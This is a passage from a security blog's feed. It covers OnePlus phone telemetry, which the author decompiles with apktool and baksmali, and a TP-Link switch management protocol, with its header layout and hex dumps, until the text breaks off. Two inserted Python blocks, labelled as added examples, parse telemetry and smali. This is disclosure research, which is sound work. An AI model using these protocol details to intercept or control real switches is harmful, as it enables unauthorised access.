&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;These event data contain timestamps of which &lt;a href=&quot;https://developer.android.com/reference/android/app/Activity.html&quot;&gt;activities&lt;/a&gt; were fired up in which applications, again stamped with the phone’s serial number.&lt;/p&gt;
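As an added example (not code from the post, nor anything OnePlus ships), here is a small Python decoder for payloads shaped like the ty=4 and ty=2 records above: it converts the epoch-millisecond tk ranges and ts stamps to UTC and merges both record kinds into one time-ordered log, which is how you would audit captured device telemetry to see exactly what it reveals. The sample payloads are constructed from the fields shown; that the ty=4 pn field is the package name with the version code appended is an inference from the data, and the other field meanings are as the post describes them.

```python
import json
from datetime import datetime, timezone
from typing import Dict, List

# Constructed sample in the shape of the post's ty=4 record: per-package
# lists of [open_ms, close_ms] foreground ranges (unix epoch, milliseconds).
SAMPLE_TY4 = json.dumps({
    "ty": 4,
    "dl": [
        {"id": "258cfeb1", "pn": "com.Slack20003701", "pvc": "20003701",
         "tk": [[1484079940460, 1484079952177],
                [1484081525486, 1484081603191]], "it": 0},
        {"id": "258cfeb1", "pn": "com.microsoft.office.outlook170", "pvc": "170",
         "tk": [[1484084321735, 1484084333336]], "it": 0},
    ],
})

# Constructed sample in the shape of the post's ty=2 record: one event per
# Activity start/stop, each carrying its own epoch-millisecond timestamp.
SAMPLE_TY2 = json.dumps({
    "ty": 2,
    "dl": [
        {"id": "258cfeb1", "pi": 12795, "ts": 1484342058637,
         "pn": "com.android.chrome", "pvn": "55.0.2883.91",
         "cn": "ChromeTabbedActivity", "en": "start"},
        {"id": "258cfeb1", "pi": 26449, "ts": 1484342115620,
         "pn": "com.android.settings", "pvn": "6.0.1",
         "cn": "WifiSettingsActivity", "en": "start"},
    ],
})


def ms_to_utc(ms: int) -> str:
    """Render an epoch-millisecond stamp as 'YYYY-MM-DD HH:MM:SS UTC'."""
    dt = datetime.fromtimestamp(ms // 1000, tz=timezone.utc)
    return dt.strftime("%Y-%m-%d %H:%M:%S UTC")


def strip_version_suffix(pn: str, pvc: str) -> str:
    """Inference from the data: the ty=4 'pn' is the package name with the
    version code 'pvc' appended (com.Slack20003701 / 20003701); peel it off."""
    if pvc and pn.endswith(pvc):
        return pn[: -len(pvc)]
    return pn


def app_sessions(payload: str) -> List[Dict]:
    """Flatten a ty=4 record into one row per foreground session, oldest first."""
    rec = json.loads(payload)
    if rec.get("ty") != 4:
        raise ValueError("expected a ty=4 (app usage) record")
    rows = []
    for entry in rec["dl"]:
        pkg = strip_version_suffix(entry["pn"], str(entry.get("pvc", "")))
        for start_ms, end_ms in entry["tk"]:
            rows.append({
                "package": pkg,
                "start": ms_to_utc(start_ms),
                "end": ms_to_utc(end_ms),
                "seconds": round((end_ms - start_ms) / 1000, 1),
            })
    # Fixed-width ISO strings sort chronologically as plain text.
    rows.sort(key=lambda r: r["start"])
    return rows


def activity_events(payload: str) -> List[Dict]:
    """Flatten a ty=2 record into one row per Activity start/stop event."""
    rec = json.loads(payload)
    if rec.get("ty") != 2:
        raise ValueError("expected a ty=2 (activity event) record")
    return [{"time": ms_to_utc(e["ts"]), "package": e["pn"],
             "activity": e["cn"], "event": e["en"]}
            for e in sorted(rec["dl"], key=lambda e: e["ts"])]


def timeline(*payloads: str) -> List[str]:
    """Merge both record kinds into one human-readable, time-ordered log."""
    lines = []
    for p in payloads:
        ty = json.loads(p).get("ty")
        if ty == 4:
            for r in app_sessions(p):
                lines.append(f"{r['start']}  {r['package']} in foreground "
                             f"for {r['seconds']}s (until {r['end']})")
        elif ty == 2:
            for r in activity_events(p):
                lines.append(f"{r['time']}  {r['package']}/{r['activity']} {r['event']}")
    return sorted(lines)


if __name__ == "__main__":
    for line in timeline(SAMPLE_TY4, SAMPLE_TY2):
        print(line)
```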

&lt;p&gt;I took to Twitter to ask OnePlus how this could be turned off, which disappointingly led down the usual path of “troubleshooting” suggestions before being met with radio silence:&lt;/p&gt;

&lt;blockquote class=&quot;twitter-tweet&quot; data-lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;Hey &lt;a href=&quot;https://twitter.com/OnePlus_Support&quot;&gt;@OnePlus_Support&lt;/a&gt;, it&amp;#39;s none of your business when I turn my screen on/off or unlock my phone - how do I turn this off? /cc:&lt;a href=&quot;https://twitter.com/troyhunt&quot;&gt;@troyhunt&lt;/a&gt; &lt;a href=&quot;https://t.co/VihaIDI6wP&quot;&gt;pic.twitter.com/VihaIDI6wP&lt;/a&gt;&lt;/p&gt;&amp;mdash; Christopher Moore (@chrisdcmoore) &lt;a href=&quot;https://twitter.com/chrisdcmoore/status/819708963633541121&quot;&gt;January 13, 2017&lt;/a&gt;&lt;/blockquote&gt;
&lt;script async=&quot;&quot; src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;

&lt;blockquote class=&quot;twitter-tweet&quot; data-lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;&lt;a href=&quot;https://twitter.com/chrisdcmoore&quot;&gt;@chrisdcmoore&lt;/a&gt; Try wiping out the cache.Turn off your device&amp;gt;Power key + volume down&amp;gt;English&amp;gt;Wipe and cache&amp;gt;Wipe Cache&amp;gt;Confirm wipe&amp;gt;Reboot.&lt;/p&gt;&amp;mdash; OnePlus Support (@OnePlus_Support) &lt;a href=&quot;https://twitter.com/OnePlus_Support/status/819951791827611650&quot;&gt;January 13, 2017&lt;/a&gt;&lt;/blockquote&gt;
&lt;script async=&quot;&quot; src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;

&lt;blockquote class=&quot;twitter-tweet&quot; data-lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;&lt;a href=&quot;https://twitter.com/chrisdcmoore&quot;&gt;@chrisdcmoore&lt;/a&gt; Alright. Please try doing a hard reset &lt;a href=&quot;https://t.co/1qyq9XajiJ&quot;&gt;https://t.co/1qyq9XajiJ&lt;/a&gt; and see if there are improvements.&lt;/p&gt;&amp;mdash; OnePlus Support (@OnePlus_Support) &lt;a href=&quot;https://twitter.com/OnePlus_Support/status/820033728596451329&quot;&gt;January 13, 2017&lt;/a&gt;&lt;/blockquote&gt;
&lt;script async=&quot;&quot; src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;

&lt;p&gt;A member of the community, &lt;a href=&quot;https://twitter.com/VenomSarad&quot;&gt;@VenomSarad&lt;/a&gt;, who had noticed my tweets suggested that, even if they wanted to, OnePlus support were not allowed to suggest disabling applications, and that my time might be better spent looking on their forums:&lt;/p&gt;

&lt;blockquote class=&quot;twitter-tweet&quot; data-lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;&lt;a href=&quot;https://twitter.com/chrisdcmoore&quot;&gt;@chrisdcmoore&lt;/a&gt; &lt;a href=&quot;https://twitter.com/OnePlus_Support&quot;&gt;@OnePlus_Support&lt;/a&gt; The support team isn&amp;#39;t allowed tell people to disable apps. You may want to go to OnePlus forum for this&lt;/p&gt;&amp;mdash; Sarad (@VenomSarad) &lt;a href=&quot;https://twitter.com/VenomSarad/status/820070636647317504&quot;&gt;January 14, 2017&lt;/a&gt;&lt;/blockquote&gt;
&lt;script async=&quot;&quot; src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;

&lt;p&gt;I did some searching for any other mentions of this analytics data collection, and came across a few forum posts of varying relevance, the closest being &lt;a href=&quot;https://forums.oneplus.net/threads/android-uid-system-does-requests-to-open-oneplus-net.472803/&quot;&gt;this one&lt;/a&gt;, as well as a &lt;a href=&quot;https://www.reddit.com/r/oneplus/comments/4t20ri/oxygenos_reports_back_tons_of_data_with/&quot;&gt;thread on Reddit&lt;/a&gt; based on a tweet from July 2016 that rather closely mirrors my own sentiments:&lt;/p&gt;

&lt;blockquote class=&quot;twitter-tweet&quot; data-lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;&lt;a href=&quot;https://twitter.com/oneplus&quot;&gt;@oneplus&lt;/a&gt; Why are you collecting timestamps of when I unlock my phone, and when the screen turns on/off? &lt;a href=&quot;https://twitter.com/hashtag/caught?src=hash&quot;&gt;#caught&lt;/a&gt;&lt;a href=&quot;https://t.co/ejt4p9uPFn&quot;&gt;https://t.co/ejt4p9uPFn&lt;/a&gt;&lt;/p&gt;&amp;mdash; Tux (@__Tux) &lt;a href=&quot;https://twitter.com/__Tux/status/754085708843786240&quot;&gt;July 15, 2016&lt;/a&gt;&lt;/blockquote&gt;
&lt;script async=&quot;&quot; src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;

&lt;p&gt;Reading through the Reddit thread, we learn that the code responsible for this data collection is part of the OnePlus Device Manager and the OnePlus Device Manager Provider, which run the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;OneplusAnalyticsJobService&lt;/code&gt; under the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;OnePlus System Service&lt;/code&gt;.
In my case, these services had sent 16MB of data in approximately 10 hours.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/images/oneplus-services-orig.png&quot;&gt;&lt;img src=&quot;/images/oneplus-services.png&quot; alt=&quot;oneplus system service running services&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pm&lt;/code&gt; to locate the application’s package file, we find it at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/system/priv-app/OPDeviceManager/OPDeviceManager.apk&lt;/code&gt;.
Grabbing the APK and extracting it with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;apktool&lt;/code&gt; gives us the manifest and some resources, but no bytecode. This is because, as a system application, it has been optimised: the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;classes.dex&lt;/code&gt; file has been removed from the APK archive, compiled into an architecture-specific &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.odex&lt;/code&gt; file and placed at, in my case, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/system/priv-app/OPDeviceManager/oat/arm64/OPDeviceManager.pdex&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Running this, in combination with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;boot.oat&lt;/code&gt;, through &lt;a href=&quot;https://github.com/JesusFreke/smali&quot;&gt;baksmali&lt;/a&gt; gives us the bytecode for further analysis.
The OnePlus Device Manager (OPDM), which drives the OnePlus System Service, uses a number of libraries. Some are expected given the data we’ve seen, such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;com.google.gson&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;com.squareup.okhttp&lt;/code&gt; for serialisation and making requests; others are less so, such as the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;com.amap.api&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;com.autonavi.aps.amapapi&lt;/code&gt; namespaces, which imply geolocation functionality.&lt;/p&gt;

&lt;p&gt;Here’s a list of the public methods in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;net/oneplus/odm/common/Utils.smali&lt;/code&gt;, to give an idea of the breadth of this functionality and of the kinds of data it might collate:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;.method public static encodeToBase64(Ljava/lang/String;)Ljava/lang/String;
.method public static getAndroidVersion()Ljava/lang/String;
.method public static getBSSID(Landroid/content/Context;)Ljava/lang/String;
.method public static getBatteryLevel(Landroid/content/Context;)F
.method public static getBatteryStatus(Landroid/content/Context;)Ljava/lang/String;
.method public static getBrandName()Ljava/lang/String;
.method public static getCellSignalLevel(Landroid/content/Context;)Ljava/lang/String;
.method public static getDeviceId()Ljava/lang/String;
.method public static getIMEI(Landroid/content/Context;)Ljava/lang/String;
.method public static getIMEI1(Landroid/content/Context;)Ljava/lang/String;
.method public static getIsHiddenSSID(Landroid/content/Context;)Z
.method public static getLocale(Landroid/content/Context;)Ljava/util/Locale;
.method public static getMacAddr(Landroid/content/Context;)Ljava/lang/String;
.method public static getModelName()Ljava/lang/String;
.method public static getOSVersion()Ljava/lang/String;
.method public static getPCBA()Ljava/lang/String;
.method public static getResolutionHeight(Landroid/content/Context;)I
.method public static getResolutionWidth(Landroid/content/Context;)I
.method public static getRomVersion()Ljava/lang/String;
.method public static getSimCountryCode(Landroid/content/Context;)Ljava/lang/String;
.method public static getSoftVersion()Ljava/lang/String;
.method public static getTimezone()Ljava/lang/String;
.method public static getWifiMacAddress(Landroid/content/Context;)Ljava/lang/String;
.method public static getWifiSSID(Landroid/content/Context;)Ljava/lang/String;
.method public static getWifiSignalLevel(Landroid/content/Context;)I
.method public static isH2()Z
.method public static isO2()Z
.method public static isRooted()Z
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
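&lt;p&gt;Reading a method list like this by eye works for one class, but not for a whole APK. As an added example (not code from the original post), the following Python parses baksmali &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.method&lt;/code&gt; declarations, decodes the Dalvik type descriptors into Java-style signatures and flags methods whose names suggest they return device or network identifiers. The sample input is a constructed excerpt based on the list above (the private &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;helper&lt;/code&gt; line is invented to exercise array descriptors), and the keyword list is a heuristic chosen for this example, not anything found in the APK.&lt;/p&gt;

```python
# Added example, not code from the original post: turn baksmali ".method" lines into
# readable Java-style signatures and flag methods that hand back device or network
# identifiers. SAMPLE_SMALI is a constructed excerpt based on the Utils.smali method
# list in the text; the private "helper" line is invented to exercise array descriptors.

SAMPLE_SMALI = '''\
.method public static getAndroidVersion()Ljava/lang/String;
.method public static getBSSID(Landroid/content/Context;)Ljava/lang/String;
.method public static getBatteryLevel(Landroid/content/Context;)F
.method public static getIMEI(Landroid/content/Context;)Ljava/lang/String;
.method public static getIsHiddenSSID(Landroid/content/Context;)Z
.method public static getMacAddr(Landroid/content/Context;)Ljava/lang/String;
.method public static getResolutionHeight(Landroid/content/Context;)I
.method private static helper([B)[Ljava/lang/String;
.method public static isRooted()Z
'''

PRIMITIVES = {'V': 'void', 'Z': 'boolean', 'B': 'byte', 'S': 'short', 'C': 'char',
              'I': 'int', 'J': 'long', 'F': 'float', 'D': 'double'}

# Heuristic keyword list chosen for this example (not from the APK): method names containing
# one of these usually return something that ties telemetry to a specific device or person.
IDENTIFIER_HINTS = ('imei', 'imsi', 'deviceid', 'serial', 'mac', 'bssid', 'ssid', 'pcba')


def parse_descriptor(desc, pos=0):
    """Decode one Dalvik type descriptor starting at desc[pos]; return (java_type, next_pos)."""
    dims = 0
    while desc[pos] == '[':          # array dimensions prefix the element type
        dims += 1
        pos += 1
    c = desc[pos]
    if c == 'L':                     # class type: Lpkg/Name; becomes pkg.Name
        end = desc.index(';', pos)
        name = desc[pos + 1:end].replace('/', '.')
        pos = end + 1
    elif c in PRIMITIVES:
        name = PRIMITIVES[c]
        pos += 1
    else:
        raise ValueError('bad descriptor %r at offset %d' % (desc, pos))
    return name + '[]' * dims, pos


def parse_params(params):
    """Decode the concatenated descriptors between the parentheses."""
    out, pos = [], 0
    while pos != len(params):
        java_type, pos = parse_descriptor(params, pos)
        out.append(java_type)
    return out


def parse_method(line):
    """Return a dict for a '.method' declaration, or None for any other smali line."""
    tokens = line.split()
    if len(tokens) == 0 or tokens[0] != '.method':
        return None
    name, rest = tokens[-1].split('(', 1)
    params, ret = rest.split(')', 1)
    return {'modifiers': tokens[1:-1], 'name': name,
            'params': parse_params(params), 'returns': parse_descriptor(ret)[0]}


def java_signature(method):
    return '%s %s %s(%s)' % (' '.join(method['modifiers']), method['returns'],
                             method['name'], ', '.join(method['params']))


def identifier_methods(smali_text):
    """Signatures of declared methods whose names match IDENTIFIER_HINTS."""
    hits = []
    for line in smali_text.splitlines():
        method = parse_method(line)
        if method is not None and any(h in method['name'].lower() for h in IDENTIFIER_HINTS):
            hits.append(java_signature(method))
    return hits


if __name__ == '__main__':
    for sig in identifier_methods(SAMPLE_SMALI):
        print(sig)
```

&lt;p&gt;Pointed at the output directory of baksmali (one &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.smali&lt;/code&gt; file per class), the same function gives a quick inventory of every identifier-returning method in the package, which is a reasonable first filter before reading the code that calls them.&lt;/p&gt;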

&lt;p&gt;Unfortunately, as this is a system service, there doesn’t appear to be any way of permanently disabling the data collection or removing the functionality without rooting the phone.
The alternatives are to stop the service every time you boot your phone (assuming it doesn’t get periodically restarted), to use an app to achieve the same effect, or perhaps to block communication with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;open.oneplus.net&lt;/code&gt; somehow.&lt;/p&gt;

&lt;p&gt;This kind of data collection, especially one containing information that can be directly tied back to me as an individual, should really be opt-in and/or have an easily accessible off switch…&lt;/p&gt;
</description>
        <pubDate>Tue, 06 Jun 2017 00:00:00 +0000</pubDate>
        <link>/post/oneplus-analytics/</link>
        <guid isPermaLink="true">/post/oneplus-analytics/</guid>
        
        
      </item>
    
      <item>
        <title>Information disclosure vulnerability in TP-Link Easy Smart switches</title>
        <description>&lt;p&gt;&lt;em&gt;Note: since beginning this research back in February, another security researcher &lt;a href=&quot;https://twitter.com/chmod750&quot;&gt;@chmod750&lt;/a&gt; has independently &lt;a href=&quot;https://chmod750.com/2017/04/23/vulnerability-disclosure-tp-link/&quot;&gt;discovered and disclosed&lt;/a&gt; much of what I am about to talk about!&lt;/em&gt;&lt;/p&gt;

&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p&gt;I recently acquired a &lt;a href=&quot;http://www.tp-link.com/us/products/details/TL-SG108E.html&quot;&gt;TP-Link TL-SG108E (V1) Easy Smart switch&lt;/a&gt;. The Easy Smart range of switches from TP-Link are targeted at the advanced consumer market; they have some enterprise-class managed switching features such as VLAN tagging and port mirroring, but come with consumer-level hardware, price tag and, as we’ll see, management features.&lt;/p&gt;

&lt;p&gt;The TL-SG108E lacks the usual telnet/SSH command-line interface and web interface that you might expect for managed networking equipment. Instead, management takes place solely via a Java GUI application - the Easy Smart Configuration Utility (ESCU).&lt;/p&gt;

&lt;p&gt;Upon startup, the ESCU goes through a discovery phase to look for Easy Smart switches on your network. After discovery, you have the ability to view some basic information about each switch, change a switch’s network configuration (provided you know the credentials for the switch), or you can log in to the switch in order to manage all of its features. See the &lt;a href=&quot;http://static.tp-link.com/res/down/doc/Easy_Smart_Configuration_Utility_UG.pdf&quot;&gt;TP-Link manual&lt;/a&gt; for a thorough run-down of the management utility.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/tplink/discovery.png&quot; alt=&quot;tplink discovery phase&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;management-traffic&quot;&gt;Management traffic&lt;/h2&gt;

&lt;p&gt;Let’s take a look at what is happening behind the scenes by using &lt;a href=&quot;https://www.wireshark.org/&quot;&gt;Wireshark&lt;/a&gt; to examine the network traffic sent by the utility and the switch.&lt;/p&gt;

&lt;h3 id=&quot;discovery-phase&quot;&gt;Discovery phase&lt;/h3&gt;

&lt;p&gt;During the discovery phase, a UDP packet is sent from each of my network interfaces with source port 29809 to the IPv4 broadcast address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;255.255.255.255&lt;/code&gt;, destination port 29808.&lt;/p&gt;

&lt;p&gt;Each switch that receives this discovery probe sends a reply in the form of a UDP packet with source port 29808 to the IPv4 broadcast address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;255.255.255.255&lt;/code&gt;, destination port 29809.&lt;/p&gt;

&lt;p&gt;Notice that there was no need for the switch to reply to the broadcast address - it would have known who was looking for it by examining the source IP address and could have replied over unicast rather than announcing its presence to the whole network.&lt;/p&gt;

&lt;p&gt;Once the discovery phase has finished, the utility lists the discovered switch and offers two options. Clicking the cog icon underneath the “IP Setting” heading gives a quick way of changing the switch’s management network settings (provided I have the administrative username and password). Clicking the person silhouette icon underneath the “Login” heading prompts me for a username and password and, if they are correct, drops me into the main part of the application, which allows me to view and modify all of the switch’s features.&lt;/p&gt;

&lt;h3 id=&quot;logon-and-management-phase&quot;&gt;Logon and management phase&lt;/h3&gt;

&lt;p&gt;The traffic which passes over the wire whilst logging in to a switch and exercising the management functionality continues in the same vein as the discovery traffic - the destination address is always &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;255.255.255.255&lt;/code&gt;, meaning that anyone on the local network sees this communication in its entirety. This is less than ideal, but at first glance the contents of the traffic are not easily readable.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/tplink/wireshark_enc.png&quot; alt=&quot;wireshark traffic encrypted&quot; /&gt;&lt;/p&gt;

&lt;p&gt;A quick Google on the topic turned up &lt;a href=&quot;https://www.pentestpartners.com/blog/how-i-can-gain-control-of-your-tp-link-home-switch/&quot;&gt;an excellent blog post from Pentest Partners&lt;/a&gt; from mid-2016 which covers these same concerns. Furthermore, they determined that the management traffic is encrypted using a key which is hard-coded in both the switch firmware and the configuration utility.&lt;/p&gt;

&lt;p&gt;As that article explains, if you’re managing one of these switches whilst someone is listening elsewhere on the same network, then they get to see everything; the switch’s management credentials, configuration and changes you make to the configuration.&lt;/p&gt;

&lt;p&gt;This requires patience on the attacker’s part - they have to be fortunate enough to be capturing traffic whilst the switch is being legitimately managed. Let’s dive a little further and look at the management protocol itself to see if there are active attacks we can use against the switch.&lt;/p&gt;

&lt;h2 id=&quot;the-easy-smart-configuration-protocol-escp&quot;&gt;The Easy Smart Configuration Protocol (ESCP)&lt;/h2&gt;

&lt;p&gt;Armed with the crypto key from decompiling the configuration utility, we can begin to examine the payload of the management traffic in its unencrypted form and compare it with the actions we carry out in the utility.&lt;/p&gt;

&lt;p&gt;From manually reverse engineering the traffic, and inspecting the decompiled utility, it would appear that all of the packets have a 32 byte header that looks like this:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;VV TT SS SS SS SS SS SS CC CC CC CC CC CC QQ QQ
EE EE EE EE LL LL FF FF 00 00 KK KK XX XX XX XX
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;with the following fields (everything’s big-endian):&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;VV&lt;/code&gt; - protocol version (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x01&lt;/code&gt; in my case)&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TT&lt;/code&gt; - packet type
    &lt;ul&gt;
      &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;00&lt;/code&gt; for discovery probe&lt;/li&gt;
      &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;01&lt;/code&gt; for GET request&lt;/li&gt;
      &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;02&lt;/code&gt; for GET/discovery response&lt;/li&gt;
      &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;03&lt;/code&gt; for SET/login request&lt;/li&gt;
      &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;04&lt;/code&gt; for SET response&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SS SS SS SS SS SS&lt;/code&gt; - the MAC address of the switch (filled with zeros for discovery probes)&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CC CC CC CC CC CC&lt;/code&gt; - the MAC address of the management client&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;QQ QQ&lt;/code&gt; - a sequence number, shared by a request and its response so that the two can be correlated&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;EE EE EE EE&lt;/code&gt; - error code (filled with zeroes for OK)&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;LL LL&lt;/code&gt; - packet length, including this header&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FF FF&lt;/code&gt; - fragmentation offset, for when requests/responses are too big for one packet&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;00 00&lt;/code&gt; - unused, as far as I can tell&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;KK KK&lt;/code&gt; - a token of some description, which is refreshed before login and set requests&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;XX XX XX XX&lt;/code&gt; - a checksum, which is unused (I’ve only ever seen it filled with zeroes)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Following the header is the payload, which is zero or more &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;(Type, Length, Value)&lt;/code&gt; tuples (I’m going to call these TLVs), with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Type&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Length&lt;/code&gt; being two bytes each, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Value&lt;/code&gt; having a length of, well, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Length&lt;/code&gt;. Finally, the packet is completed with a byte sequence of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FF FF 00 00&lt;/code&gt;.&lt;/p&gt;

&lt;h3 id=&quot;get-requests&quot;&gt;GET requests&lt;/h3&gt;

&lt;p&gt;To make this more concrete, let’s have a look at a request-reply pair of packets which pass over the wire when we navigate to the “Switching” -&amp;gt; “Port Setting” part of the configuration utility (pictured below).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/tplink/ports.png&quot; alt=&quot;port setting screen&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;request&quot;&gt;Request&lt;/h4&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;0000   01 01 66 55 44 33 22 11 aa bb cc dd ee ff 03 ba  ....m..fx$...G..
0010   00 00 00 00 00 28 00 00 00 00 24 78 00 00 00 00  .....(....$x....
0020   10 00 00 00 ff ff 00 00
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Here we see a packet type of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;01&lt;/code&gt;, indicating that this is a GET request, of length &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x28&lt;/code&gt;, intended for the switch with MAC address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;66:55:44:33:22:11&lt;/code&gt;, from the management client with MAC address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;aa:bb:cc:dd:ee:ff&lt;/code&gt;. There is one TLV, with type &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;10 00&lt;/code&gt; (which means switchport configuration) and length zero.&lt;/p&gt;

&lt;h4 id=&quot;reply&quot;&gt;Reply&lt;/h4&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;0000   01 02 66 55 44 33 22 11 aa bb cc dd ee ff 03 ba  ....m..fx$...G..
0010   00 00 00 00 00 7c 00 00 00 00 24 78 00 00 00 00  .....|....$x....
0020   10 00 00 07 01 01 00 01 06 00 00 10 00 00 07 02  ................
0030   01 00 01 06 00 00 10 00 00 07 03 01 00 01 06 00  ................
0040   00 10 00 00 07 04 01 00 01 06 00 00 10 00 00 07  ................
0050   05 01 00 01 06 00 00 10 00 00 07 06 01 00 01 00  ................
0060   00 00 10 00 00 07 07 01 00 01 05 00 00 10 00 00  ................
0070   07 08 01 00 01 05 00 00 ff ff 00 00              ............
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Here we see a packet type of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;02&lt;/code&gt;, indicating a GET response of length &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x7c&lt;/code&gt; with the same MAC address fields set. The payload holds eight TLVs (which unsurprisingly corresponds with the number of ports on the switch), each of type &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;10 00&lt;/code&gt; and length 7. Putting them on separate rows and comparing them with the screenshot above, we start to see how each byte of the TLV’s value corresponds with the status of the switchport as it is shown in the UI.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;10 00 00 07 01 01 00 01 06 00 00
10 00 00 07 02 01 00 01 06 00 00
